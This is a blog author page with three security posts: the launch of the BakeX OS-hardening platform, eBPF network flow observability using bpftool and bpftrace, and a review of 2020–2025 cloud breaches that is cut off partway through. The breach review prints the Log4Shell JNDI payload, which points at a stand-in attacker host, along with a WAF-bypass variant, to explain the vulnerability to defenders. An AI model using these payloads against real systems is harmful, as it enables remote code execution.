Vamshi Krishna Santhapuri, Author at Linuxcent

BakeX — OS Hardening as a Platform

July 27, 2026May 31, 2026 by Vamshi Krishna Santhapuri

Reading Time: 8 minutes

OS Hardening as Code, Episode 6
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate · BakeX Platform**

Note: this series was written when the project was called Stratum. It was renamed to
BakeX at v0.6.0 — same project, same Apache 2.0 license, same team. The old
github.com/rrskris/Stratum URL redirects here, and pip install stratumoss is retired in
favour of pip install bakex. Current home:
github.com/invicton/bakex.

TL;DR

BakeX is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all in the repository
Self-hostable end to end: nothing is locked to a hosted service, and there is no paid tier gating the pipeline
Two real extension points: provider plugins (drop-in .py or a bakex.providers entry point) and blueprints (pure YAML, no code)
Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API
The series taught the user-facing interface for five episodes; EP06 covers what’s underneath and how to build on it
Installation is git clone + docker compose up, or pip install bakex for the CLI and web app

The Series Arc, Inverted

EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:

EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    bakex validate          ← EP02 (blueprint as code)
    bakex build             ← EP02
      one file per provider ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan           ← EP04 (compliance grading)
    Grade: A (score 94)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    passed: true
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)

For five episodes, you’ve used BakeX as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.

I’ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.

The tools exist. ansible-lockdown applies CIS controls reliably. OpenSCAP verifies them accurately. The CI/CD systems can enforce anything you can express as a pass/fail. The gap isn’t the tooling — it’s the integration layer that ties them together into a reproducible, auditable pipeline.

BakeX is that integration layer, open-sourced.

The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there’s no step to skip.

The Architecture

┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                    BakeX Engine                          │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴──────────┐
           ▼                     ▼
  ┌─────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │  POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘

Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.

Installation

Three ways in, depending on how much you want installed on the host.

Docker Compose — recommended, everything preinstalled:

git clone https://github.com/invicton/bakex.git
cd bakex
docker compose up

Open http://localhost:8001. Log in with any username and the admin token as the password —
it’s generated on first start and written to data/.admin_token. Set BAKEX_ADMIN_TOKEN and
BAKEX_SECRET_KEY in docker-compose.yml if you want logins that survive a rebuild.

Compose mounts ~/.aws, ~/.config/gcloud, and ~/.ssh read-only, plus persistent ./data,
./profiles, and ./plugins/providers. That last mount is the one to notice — it’s the
drop-in directory for provider plugins, which matters in the next section.

Published image:

docker run -p 8000:8000 rrskris/bakex:latest

PyPI — CLI and web app:

pip install "bakex[all-providers]"   # or pick extras: aws, gcp, azure, linode, digitalocean, proxmox
bakex serve --port 8000

One caveat worth stating plainly rather than letting you discover it: the extras install each
provider’s cloud SDK, and Ansible and OpenSCAP must be present on the host for real builds. If you
want the batteries-included path, use Compose. bakex validate works anywhere with no host
dependencies at all.

There is no Helm chart. BakeX is a build tool that talks to cloud APIs, not a cluster workload —
it does not need to live in Kubernetes to harden images for it.

The Three Extension Points

1. Blueprints — the extension point with no code in it

The highest-leverage way to extend BakeX isn’t Python. It’s a YAML file.

A blueprint is a complete, self-contained description of a hardened OS on a specific provider,
and the library ships 18 of them. Adding the nineteenth — say Ubuntu 24.04, or CIS Level 2 for a
distro that only has Level 1 today — requires no engine changes, because the benchmark, profile,
and datastream are just strings handed to oscap.

The full format is published as a JSON Schema (Draft 2020-12) at
docs/schema/hardening-blueprint.schema.json. Point your editor at it for autocomplete and
inline validation, or hand it to an LLM and let it draft the blueprint — the schema was published
partly so that agents could write these correctly without reading the source.

The loop is short enough to run in a coffee break:

$EDITOR blueprints/ubuntu/24.04/cis-l1-aws.yaml
bakex validate blueprints/ubuntu/24.04/cis-l1-aws.yaml

Validation is offline and checks more than syntax — it rejects OS/provider combinations the
catalog doesn’t support, so you find out that a distro isn’t available on your target cloud in
milliseconds rather than fifteen minutes into a paid build.

2. Provider Plugins

Adding a cloud means implementing four methods. That’s the whole interface
(bakex/plugins/base_provider.py):

# plugins/providers/my_cloud.py
from bakex.plugins.base_provider import BaseProvider, ProviderResult
from bakex.core.models import ComplianceProfile

class MyCloudProvider(BaseProvider):
    name = "my-cloud"          # matches target.provider in a blueprint

    def provision(self, profile: ComplianceProfile, **kwargs) -> str:
        """Launch a build instance; return its instance ID."""
        ...

    def run_ansible(self, instance_id: str, profile: ComplianceProfile) -> None:
        """Apply the Ansible-Lockdown hardening roles."""
        ...

    def snapshot(self, instance_id: str, profile: ComplianceProfile) -> ProviderResult:
        """Capture the golden image; return the artifact ID."""
        ...

    def teardown(self, instance_id: str) -> None:
        """Destroy the ephemeral build instance."""
        ...

There is no registration command. The loader (bakex/plugins/loader.py) is hybrid and finds
plugins two ways:

Drop-in — put the .py file in plugins/providers/. That directory is a Compose volume
mount, so a plugin dropped there is live in the container without rebuilding an image.
Entry point — ship a pip-installable package declaring a bakex.providers entry point.
This is how a third party distributes a provider without touching the BakeX repo.

Entry points load first and drop-ins load second, so a local file deliberately shadows an
installed package of the same name — which is exactly what you want when debugging someone
else’s provider.

The plugin becomes usable by writing provider: my-cloud in a blueprint’s target block. There
is no --provider flag to pass, because there is no --provider flag anywhere.

One honest note on the validation interaction from EP02: the compatibility check only objects
when both the OS and the provider are in the catalog. An unknown provider is assumed to be a
valid third-party plugin rather than an error — existence is the plugin registry’s call at build
time, compatibility is validation’s. That’s what makes shipping a provider out-of-tree possible
at all.

3. Pipeline Integrations

Beyond the curl-based gate from EP05, BakeX has a webhook system. Webhooks are registered through
the API rather than a config file, so they can be managed by the same automation that manages
everything else:

curl -X POST http://localhost:8001/api/webhooks \
  -H "Content-Type: application/json" \
  -d '{
    "url": "https://hooks.slack.com/services/…",
    "events": ["build.failed", "scan.grade_change"],
    "label": "platform-security alerts"
  }'

Five events fire: build.complete, build.failed, scan.complete, scan.failed, and
scan.grade_change. Registering an unknown event name is a 422 rather than a silent no-op —
a small thing that saves an afternoon.

scan.grade_change is the one to wire up first. A build that fails is loud on its own; a base
image that quietly slid from A to B between two scans is the signal nobody notices.

Deliveries are signed. The registration response returns a secret once, and every request
carries an X-BakeX-Signature: sha256=… HMAC so the receiver can verify the payload came from
your BakeX instance and not from anyone who guessed the endpoint URL.

There’s a defensive detail here that’s worth calling out, because it’s the kind of thing that
usually ships broken: webhook target URLs are checked against loopback, private, link-local, and
reserved ranges — including 169.254.169.254 — and they’re re-resolved at send time, not just
at registration. A user-configurable URL that the server will fetch is a textbook SSRF into the
cloud metadata endpoint, and on a tool that holds cloud credentials that would be a very bad day.

The Open-Core Model

BakeX sits alongside the tools that became infrastructure standards by being genuinely usable
before they were commercial:

Tool	Model
Terraform / OpenTofu	Core OSS, enterprise features in paid tier
Cilium / Isovalent	Core OSS, enterprise support/features in paid tier
Vault / HCP Vault	Core OSS, hosted/enterprise in paid tier
BakeX	Engine + blueprint + scanner + Pipeline API: Apache 2.0, no paid tier today

Everything taught in this series — the blueprint format, the build pipeline, the compliance
grading, the CI/CD gate — is in the repository. There is no feature held back, because there is
currently nothing to hold it back for. Self-host it, extend it, fork it.

Worth being straight about where the project actually is: BakeX is young. It has signed releases,
SBOMs and provenance attestations, an OpenSSF Scorecard, a published JSON Schema, and over a
thousand tests — the engineering is in good order. What it does not yet have is users. If you’re
reading this and the shape of the tool fits your problem, you would be early, and early is when
your opinion changes the design.

The repository is at: github.com/invicton/bakex

What This Series Taught

EP01 — EP06 in one view:

Episode	What you learned	What BakeX does
EP01	Default AMIs are insecure by design	Replaces the default AMI with a hardened golden image
EP02	Blueprint as code — the 2am skip disappears	HardeningBlueprint YAML, `bakex validate` / `bakex build`
EP03	One posture, six providers, no drift	18 shipped blueprints; only `target` differs across providers
EP04	Automated OpenSCAP — grade at build time	A–F from the XCCDF score, SARIF 2.1.0 export, baseline compare
EP05	CI/CD gate — the unhardened image never deploys	Pipeline API: `POST /api/pipeline/scan`, parse `.passed`
EP06	The platform — OSS, self-hostable, extendable	Apache 2.0, Compose install, blueprints + provider plugins

What’s Next

This series closes the OS hardening gap. The same principle — declare desired state, build
reproducibly, verify automatically — applies to every layer of your infrastructure.

Write the next blueprint

The most useful thing you can do with what this series taught is add a blueprint, and it is
genuinely pure YAML — no Python, no engine changes, no build system to learn.

You’ve spent five episodes on Ubuntu 22.04 CIS Level 1. The natural next one is Level 2 for the
same OS: #1 — Ubuntu 22.04 CIS Level 2. The
issue carries the acceptance criteria and the exact verify command, and the review loop is
bakex validate returning 0.

If a different distro is closer to what you actually run, the whole set is filed and labelled:
good first issues, blueprint label.
RHEL 9, AlmaLinux 9, Rocky 9, Debian 12, and Amazon Linux 2023 all have gaps. Each one is one
file, and each is the sort of contribution that takes an evening.

GitHub: github.com/invicton/bakex

Elsewhere on the blog

If you’ve been following the eBPF: From Kernel to Cloud series,
EP10 covers what happens when you combine kernel-level observability with the hardened base BakeX
produces: every connection, every process spawn, every file access — visible from the host kernel,
on an OS baseline you can verify.

The next series is the Purple Team Playbook — real attack paths against cloud and Kubernetes
infrastructure, how they’re detected, and how they’re closed.

Get new episodes in your inbox → linuxcent.com/subscribe

Network Flow Observability — What Every Connection Reveals

July 6, 2026May 29, 2026 by Vamshi Krishna Santhapuri

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 10
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability

TL;DR

Network flow observability with eBPF attaches persistent programs to TC hooks and records every connection attempt, retransmit, reset, and drop — continuously, with no sampling
(TC hook = Traffic Control hook: the point in the Linux network stack where eBPF programs intercept packets after ingress or before egress, tied to a specific network interface)
APM tools and service mesh telemetry are interpretations of what happened; kernel-level flow data from TC hooks is the raw event stream they all derive from
Retransmit counters at the kernel level reveal congestion, half-open connections, and remote endpoint failures that application logs never surface
Cilium’s Hubble and similar tools (Pixie, Retina) are eBPF flow exporters — they run TC programs, collect perf_event or ringbuf events, and expose them over an API
You can verify what flow data a tool is actually collecting with four bpftool commands — without reading documentation
Production caution: flow maps grow with the number of active connections; pin and bound your maps, and account for the per-packet overhead on high-throughput interfaces

EP09 showed bpftrace as an on-demand kernel query tool — compile a question, get an answer, clean up. Network flow observability with eBPF is the persistent version: programs that stay attached to TC hooks across your entire fleet, recording every connection without waiting for you to ask. When a client reports intermittent failures that appear nowhere in application logs, that persistent record is what you query. This episode covers how that layer works and how to read it.

Quick Check: What Flow Data Is Your Cluster Already Collecting?

Before building anything new, check what’s already running. If you have Cilium, Pixie, or Retina on your cluster, eBPF flow programs are already attached:

# SSH into a worker node, then:

# What TC programs are attached to cluster interfaces?
bpftool net list

# Expected output on a Cilium node:
# xdp:
#
# tc:
# eth0(2) clsact/ingress prog_id 38 prio 1 handle 0x1 direct-action
# eth0(2) clsact/egress  prog_id 39 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/ingress prog_id 41 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/egress  prog_id 42 prio 1 handle 0x1 direct-action

# What maps are those programs holding state in?
bpftool map list | grep -E "flow|conn|sock|nat"

# Sample output:
# 24: hash  name cilium_ct4_global  flags 0x0
#     key 24B  value 56B  max_entries 65536  memlock 4718592B
# 25: hash  name cilium_ct4_local   flags 0x0
#     key 24B  value 56B  max_entries 8192   memlock 589824B

Each lxcXXXX interface is a pod’s veth pair. The TC programs on those interfaces are what Cilium uses to enforce NetworkPolicy and collect flow telemetry. If you see prog_id values on pod interfaces, your cluster is already doing kernel-level flow collection.

Not running Cilium? On a plain kubeadm or EKS node without a CNI that uses eBPF, bpftool net list will show no TC programs on pod interfaces — just whatever kube-proxy or the CNI plugin installed. You can still attach your own flow programs with tc qdisc add dev eth0 clsact — that’s the starting point this episode covers.

The client opened a ticket on a Tuesday afternoon. “Intermittent connection failures to the payment gateway. Started around 11 AM. Application logs say timeout. Retry logic is masking it for most users but the error rate is up 0.3%.”

I looked at the APM dashboard. The service showed elevated latency — p99 at 850ms versus a normal 120ms — but no hard errors at the application layer. The service mesh metrics showed the downstream call succeeding from the mesh’s perspective. The payment gateway team said their side looked clean.

Three tools. Three different answers. All of them interpreting the network. None of them were the network.

I ran:

bpftool map dump id 24 | grep -A5 "payment-gateway-ip"

The connection tracking map showed retransmit count 14 for a specific (src_ip, dst_ip, src_port, dst_port) tuple — the same 5-tuple, every 30 seconds, for 2 hours. The kernel was retransmitting. The TCP stack was compensating. The application was seeing sporadic success because retransmits eventually got through. The APM dashboard averaged that latency into a p99 and called it “elevated.”

The kernel had the truth. Everything above it was rounding.

Why Application-Level Metrics Miss What the Kernel Sees

Application metrics — APM spans, service mesh telemetry, load balancer health checks — operate at Layer 7. They measure round-trip time for complete requests, error codes returned, bytes transferred. They answer “did this request succeed?” not “what did the network do to make it succeed?”

The TCP stack underneath those requests handles retransmits, congestion window adjustments, RST packets, and half-open connections silently. From an application’s perspective, a request that required 3 retransmits before the ACK arrived looks identical to one that succeeded on the first attempt — slightly slower, but successful.

This is structural, not a tooling gap. Application-layer observability tools cannot see below their own protocol boundary. The kernel’s TCP implementation does not report upward when it retransmits. It just retransmits.

eBPF flow observability closes this gap by attaching programs directly to the network path — at the TC hook, which fires on every packet crossing a network interface — and recording what the kernel actually does.

How TC Hook Flow Programs Work

EP08 covered TC eBPF programs for pod network policy. Flow observability uses the same attachment point with a different purpose: instead of allowing or dropping packets, the program reads packet metadata and writes it to a map or ring buffer.

Pod sends packet
      ↓
veth interface (lxcXXXX)
      ↓
TC clsact/egress hook fires
      ↓
eBPF program reads:
  - src IP, dst IP
  - src port, dst port
  - protocol
  - packet size
  - TCP flags (SYN, ACK, FIN, RST, retransmit bit)
      ↓
Writes event to ringbuf (or perf_event_array)
      ↓
Userspace consumer reads ringbuf
      ↓
Aggregates to flow record
      ↓
Exports to Hubble/Prometheus/flow store

ringbuf — a BPF ring buffer: a lock-free, memory-efficient queue shared between a kernel eBPF program and a userspace consumer. The kernel program writes events; the userspace reader drains them. Used instead of perf_event_array in kernel 5.8+ because it avoids per-CPU memory waste and supports variable-length records. When you see Hubble exporting flows, it’s reading from a ringbuf that the TC program writes to.

The key structural property: the TC hook fires on every packet. Not sampled. Not throttled by default. Every SYN, every ACK, every RST, every retransmit. For flow observability, you typically aggregate at the program level — count packets and bytes per 5-tuple per second, rather than emitting an event per packet — but the raw visibility is there if you need it.

What Retransmit Telemetry Actually Reveals

Most flow observability implementations track TCP retransmits specifically because they are the clearest signal of network-layer trouble invisible to applications.

A TCP retransmit happens when a sender doesn’t receive an ACK within the retransmission timeout (RTO). The kernel resends the segment and doubles the timeout (exponential backoff). From the application’s perspective, the call takes longer. If retransmits keep clearing, the application sees success — just slow success.

perf_event — a kernel mechanism for collecting performance data. In eBPF, BPF_MAP_TYPE_PERF_EVENT_ARRAY lets kernel programs push variable-length records to userspace readers via a ring buffer per CPU. Older tools use perf_event_array; newer ones use BPF_MAP_TYPE_RINGBUF (single shared ring, more efficient). If you inspect an older version of Cilium’s flow exporter, you’ll see perf_event writes; newer versions use ringbuf.

To observe retransmits directly with bpftrace:

# Count retransmit events per destination IP — run for 60 seconds
bpftrace -e '
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    @retransmits[$daddr] = count();
}
interval:s:60 { print(@retransmits); clear(@retransmits); exit(); }
'

Sample output:

Attaching 2 probes...
@retransmits[10.96.0.10]:   2       # DNS service — normal
@retransmits[172.16.4.23]:  847     # payment gateway endpoint ← problem here
@retransmits[10.244.1.5]:   1       # normal pod-to-pod traffic

847 retransmits to a single endpoint in 60 seconds. That’s not noise. That’s a congested or half-open connection being retried 14 times per second by the TCP stack while the application layer averages it into “elevated latency.”

How Cilium Hubble Collects Flow Data

Hubble is the flow observability layer built into Cilium. Understanding how it works makes you able to reason about what it can and cannot see — and how to verify what it’s actually collecting.

Hubble’s architecture:

Kernel (per node)
├── TC eBPF programs on all pod veth interfaces
│     write flow events → BPF ringbuf
│
└── Hubble node agent (userspace)
      reads ringbuf
      enriches with pod metadata (Kubernetes API)
      exposes gRPC API

Cluster level
└── Hubble Relay
      aggregates per-node gRPC streams
      exposes single cluster-wide API

User tooling
└── hubble observe  /  Hubble UI  /  Prometheus exporter

The TC programs are writing raw packet events. The Hubble agent is the consumer that translates those events into Kubernetes-aware flow records — adding pod name, namespace, label, and policy verdict on top of the 5-tuple and TCP metadata the kernel provides.

To see what Hubble’s TC programs have attached:

# On any Cilium node
bpftool net list | grep lxc

# lxce4a1(23) clsact/ingress prog_id 61  ← Hubble flow program on pod interface ingress
# lxce4a1(23) clsact/egress  prog_id 62  ← Hubble flow program on pod interface egress
# lxcf7b2(31) clsact/ingress prog_id 63
# lxcf7b2(31) clsact/egress  prog_id 64

# Inspect one of those programs to confirm it's reading flow metadata
bpftool prog show id 61

# Output:
# 61: sched_cls  name tail_handle_nat  tag 3a8e2f1b4c7d9e0a  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 2144B  jited 1382B  memlock 4096B  map_ids 24,31,38
#     btf_id 142

sched_cls is the BPF program type for TC — confirming these are TC-attached flow programs. map_ids 24,31,38 — those are the maps this program reads from and writes to. You can dump any of them:

bpftool map dump id 24 | head -40

# Output (connection tracking entry):
# [{
#     "key": {
#         "saddr": "10.244.1.5",        # ← source pod IP
#         "daddr": "172.16.4.23",        # ← destination IP
#         "sport": 48291,                # ← source port
#         "dport": 443,                  # ← destination port
#         "nexthdr": 6,                  # ← protocol: TCP
#         "flags": 3                     # ← CT_EGRESS | CT_ESTABLISHED
#     },
#     "value": {
#         "rx_packets": 14832,           # ← packets received
#         "tx_packets": 14831,           # ← packets sent
#         "rx_bytes": 3841024,           # ← bytes received
#         "tx_bytes": 3756288,           # ← bytes sent
#         "lifetime": 21600,             # ← seconds until entry expires
#         "rx_closing": 0,
#         "tx_closing": 0
#     }
# }]

That’s the ground truth. Not an APM span. Not a service mesh metric. The actual per-connection counters the kernel is maintaining for that 5-tuple.

Writing a Minimal Flow Observer with bpftrace

You don’t need Cilium or Hubble to get flow telemetry. bpftrace can produce it directly on any node with BTF:

# Persistent flow table: connections + packet counts for 2 minutes
bpftrace -e '
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    $dport = $sk->__sk_common.skc_dport >> 8;
    @flows[comm, $daddr, $dport] = count();
}
interval:s:30 { print(@flows); clear(@flows); }
' --timeout 120

Sample output (every 30 seconds):

@flows[curl, 93.184.216.34, 443]:         12    # curl → example.com:443
@flows[coredns, 10.96.0.10, 53]:          341   # CoreDNS upstream queries
@flows[payment-svc, 172.16.4.23, 443]:   1204   # payment service → gateway
@flows[nginx, 10.244.2.3, 8080]:          89    # nginx → upstream pod

For retransmit tracking specifically:

# Combined flow + retransmit watcher — runs until Ctrl-C
bpftrace -e '
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    @retx[comm, $daddr] = count();
}
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    @sends[comm, $daddr] = count();
}
interval:s:10 {
    printf("=== Retransmit ratio (last 10s) ===\n");
    print(@retx);
    print(@sends);
    clear(@retx);
    clear(@sends);
}
'

This gives you both the volume of sends and the retransmit count side by side — the ratio tells you whether retransmits are a rounding error (0.01%) or a signal (5%+).

⚠ Production Gotchas

Map size bounds matter. Connection tracking maps default to tens of thousands of entries. On nodes with high connection churn (serverless, short-lived batch jobs), maps can fill and start dropping new entries silently. Check bpftool map show id N for max_entries and monitor map utilization. Cilium exposes this as cilium_bpf_map_pressure in Prometheus.

Per-packet overhead on high-throughput interfaces. A TC program that fires on every packet on a 10Gbps interface processes millions of packets per second. Aggregating at the program level (count per 5-tuple rather than emit per packet) keeps overhead manageable — Cilium does this. A naive bpftrace one-liner that emits a perf event per packet will saturate the perf ring buffer under real load. Use ringbuf write paths or aggregate before emitting.

TC hook placement and direction confusion. Ingress TC on a pod’s veth (lxcXXXX) sees egress traffic from the pod’s perspective — because the host sees the packet arriving on the veth after the pod sent it. This reversal is consistent but confusing when you’re reading direction labels in flow records. EP08 covered this in detail for policy enforcement; the same asymmetry applies to flow data.

Retransmit counters reset on connection close. If you’re tracking retransmit totals for a long-lived connection, the count is stored in the kernel’s socket state and is cleared when the socket closes. For persistent tracking across reconnects, aggregate at the flow level in userspace before the connection closes.

Hubble flow visibility requires pod interfaces. Hubble only sees traffic that crosses a pod’s veth interface. Node-to-node traffic that doesn’t involve a pod (e.g., node SSH, kubelet-to-API-server on the node IP) is not captured by default. For host-level network observability, you need a TC program on the physical interface (eth0, ens3), not just on pod veth pairs.

Quick Reference

What you want to see	Command
What TC programs are attached	`bpftool net list`
Which maps a program uses	`bpftool prog show id N` (check `map_ids`)
Connection tracking entries	`bpftool map dump id N`
Retransmits per destination	`bpftrace -e 'kprobe:tcp_retransmit_skb { ... }'`
Flow counts per process	`bpftrace -e 'kprobe:tcp_sendmsg { @[comm, daddr] = count(); }'`
Hubble flow stream (Cilium)	`hubble observe --follow`
Hubble flows for one pod	`hubble observe --pod mynamespace/mypod --follow`
Verify map pressure	`bpftool map show id N` (check `max_entries` vs entries)

Kernel function	What it marks
`tcp_sendmsg`	Data being sent on a TCP socket
`tcp_recvmsg`	Data being received on a TCP socket
`tcp_retransmit_skb`	A segment being retransmitted
`tcp_send_reset`	RST being sent
`tcp_fin`	Connection teardown initiated
`tcp_connect`	New outbound TCP connection attempt

Key Takeaways

Network flow observability with eBPF attaches TC programs that record every connection event continuously — not sampled, not throttled, not filtered by what the application reports
Retransmit telemetry from tcp_retransmit_skb reveals congestion and endpoint failures that are structurally invisible to application-layer monitoring tools
Cilium Hubble, Pixie, and Retina are all eBPF flow exporters — they run TC programs, drain a ringbuf, enrich with Kubernetes metadata, and expose the result over an API
You can verify what any flow tool is actually collecting with bpftool net list, bpftool prog show, and bpftool map dump — four commands, no documentation needed
Map sizing and per-packet overhead are the two production concerns; aggregate at the kernel level, bound your maps, and monitor map pressure
The kernel’s connection tracking map is the ground truth. APM dashboards, service mesh metrics, and load balancer health checks are all interpretations of what that map contains

What’s Next

Flow observability tells you what connections exist. EP11 goes one level deeper: what names your pods are resolving those connections to. DNS is where a compromised workload first reveals itself — it queries a domain that has no business being queried from a production pod, and if you’re not watching the kernel-level DNS path, you won’t see it until after the damage.

DNS observability at the kernel level uses tracepoint hooks on the DNS syscall path — the same ground-truth approach as flow telemetry, but for name resolution: every query, every response, tied to the pod that made it, without deploying a sidecar.

Next: DNS observability at the kernel level — what your pods are actually resolving

Get EP11 in your inbox when it publishes → linuxcent.com/subscribe

Cloud Security Breaches 2020–2025: What Actually Got Exploited

May 27, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025

TL;DR

Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident falls into at least one
SolarWinds (Dec 2020): build pipeline compromise — attacker signed malware with a legitimate cert (A08)
Log4Shell (Dec 2021): injection in a logging library present in millions of Java apps (A03)
Uber (Sep 2022): MFA fatigue against a contractor → hardcoded admin creds on internal share (A07 + A02)
CircleCI (Jan 2023): session token stolen from an engineer’s laptop → CI/CD secrets exfiltrated (A07 + A08)
Okta (Oct 2023): support system access via stolen credentials → customer tenant data exposed (A07)
XZ Utils (Apr 2024): 2-year social engineering campaign → backdoor in release tarball (A08 + A06)
The attack surface does not change — only the specific vector within each category

OWASP Mapping: This episode is cross-category — A01 through A10 all appear. Each breach is annotated with its primary OWASP mapping.

The Big Picture

┌────────────────────────────────────────────────────────────────────┐
│           2020–2025 BREACH TIMELINE                                │
│                                                                    │
│  Dec 2020    Dec 2021    Sep 2022    Jan 2023    Oct 2023  Apr 2024 │
│     │            │           │           │           │        │    │
│     ▼            ▼           ▼           ▼           ▼        ▼    │
│  Solar-      Log4Shell     Uber       CircleCI     Okta    XZ Utils│
│  Winds                                                             │
│                                                                    │
│  ══════════════════════════════════════════════════════════        │
│                                                                    │
│  Root Cause Categories (3 total):                                  │
│                                                                    │
│  SUPPLY CHAIN          IDENTITY               MISCONFIGURATION     │
│  SolarWinds            Uber                   Capital One (2019)   │
│  XZ Utils              Okta                   CircleCI (partial)   │
│  Log4Shell (partial)   CircleCI (initial)                          │
│                                                                    │
│  OWASP Primaries:                                                  │
│  A08 → A07 → A07 → A07/A08 → A07 → A08/A06                       │
│                                                                    │
└────────────────────────────────────────────────────────────────────┘

The cloud security breaches from 2020 to 2025 reveal a consistent pattern: attackers are not finding new classes of vulnerability. They are exploiting the same three root causes — identity, supply chain, misconfiguration — in different combinations against different technology stacks.

Why These Breaches Are the Curriculum

Every episode in this series from EP04 onward takes a specific attack path from these incidents and walks through the simulation, detection, and fix. You cannot understand the fix without understanding the breach mechanics. And you cannot understand why your detection didn’t fire without knowing what the attacker actually did.

This episode is the reference. When EP05 covers MFA fatigue, it builds on the Uber anatomy here. When EP09 covers XZ Utils, the supply chain mechanics here are the foundation.

December 2020: SolarWinds — Supply Chain at Scale

OWASP: A08 (Software and Data Integrity Failures)

SolarWinds is the incident that defined supply chain attacks for the decade. The attacker — attributed to Russia’s SVR — compromised the build environment for SolarWinds Orion IT monitoring software in early 2020. They inserted a backdoor called SUNBURST into the software build pipeline.

The mechanics:

Normal build pipeline:
  Source code → Build system → Sign with SolarWinds cert → Distribute → Customer installs

Compromised pipeline (SolarWinds):
  Source code → Build system → [SUNBURST injected here] → Sign with SolarWinds cert → Distribute → 18,000 customers install

SUNBURST was signed with SolarWinds’ legitimate Authenticode certificate. It passed signature verification. It was distributed through the normal software update mechanism. Customers with automatic updates installed it because the update was signed by a trusted vendor.

The backdoor remained dormant for 12–14 days after installation before activating. It used DGA (domain generation algorithm) to contact C2 infrastructure, disguising traffic as Orion telemetry. After the initial beaconing period, the attacker manually selected targets from the 18,000 infected environments.

Confirmed affected organizations: US Treasury, US Commerce Department, FireEye, Microsoft, Intel, Deloitte.

What a detection would have looked like:
– Unexpected outbound DNS queries to avsvmcloud.com subdomains
– Orion software making network connections outside its normal profile
– New scheduled tasks or service modifications by the Orion process

The structural failure: The build system was not isolated, not monitored for unexpected behavior, and the build process itself was not reproducible from source. A reproducible build would have made the SUNBURST injection detectable — the build output would not match the source.

December 2021: Log4Shell — Injection in a Logging Library

OWASP: A03 (Injection), A06 (Vulnerable and Outdated Components)

Log4Shell (CVE-2021-44228) is the closest thing to a universal vulnerability that existed in the 2020s. Log4j 2.x was embedded in thousands of Java applications — not as a direct dependency but as a transitive dependency, often several layers deep in the dependency tree. Developers frequently didn’t know they were running it.

The vulnerability: Log4j evaluated JNDI (Java Naming and Directory Interface) lookups embedded in logged strings. Any input that ended up in a log message could trigger a JNDI lookup:

${jndi:ldap://attacker.com/exploit}

# Log4j evaluates the expression, makes LDAP request to attacker.com
# Attacker's LDAP server responds with a Java class
# Log4j loads and executes the class
# Result: remote code execution

The attack was trivial to launch and extremely difficult to fully enumerate exposure for — because Log4j was present as a transitive dependency in components that teams didn’t know they owned.

What made it particularly bad for cloud infrastructure:
– Lambda functions, ECS containers, EKS workloads, and Elastic Beanstalk apps all potentially affected
– WAFs were initially bypassed with encoding variants (${${lower:j}ndi:...})
